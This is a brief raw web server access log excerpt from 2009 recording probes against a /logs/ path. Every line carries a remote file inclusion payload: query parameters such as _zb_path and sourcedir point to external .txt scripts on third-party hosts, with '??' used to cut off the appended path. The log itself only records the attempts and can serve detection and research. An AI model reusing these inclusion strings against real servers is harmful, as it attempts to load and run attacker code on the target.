61.78.62.84 - - [06/Jul/2009:05:11:14 -0400] "GET /logs/access_log.Q109061400%20%20/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:11:14 -0400] "GET /logs/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
61.78.62.84 - - [06/Jul/2009:05:11:33 -0400] "GET /logs/access_log.Q109051800%20%20/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:05:11:37 -0400] "GET /logs/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 200 8386 "-" "Mozilla/5.0"
217.125.38.117 - - [06/Jul/2009:05:11:37 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://extranet.teligentems.com/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
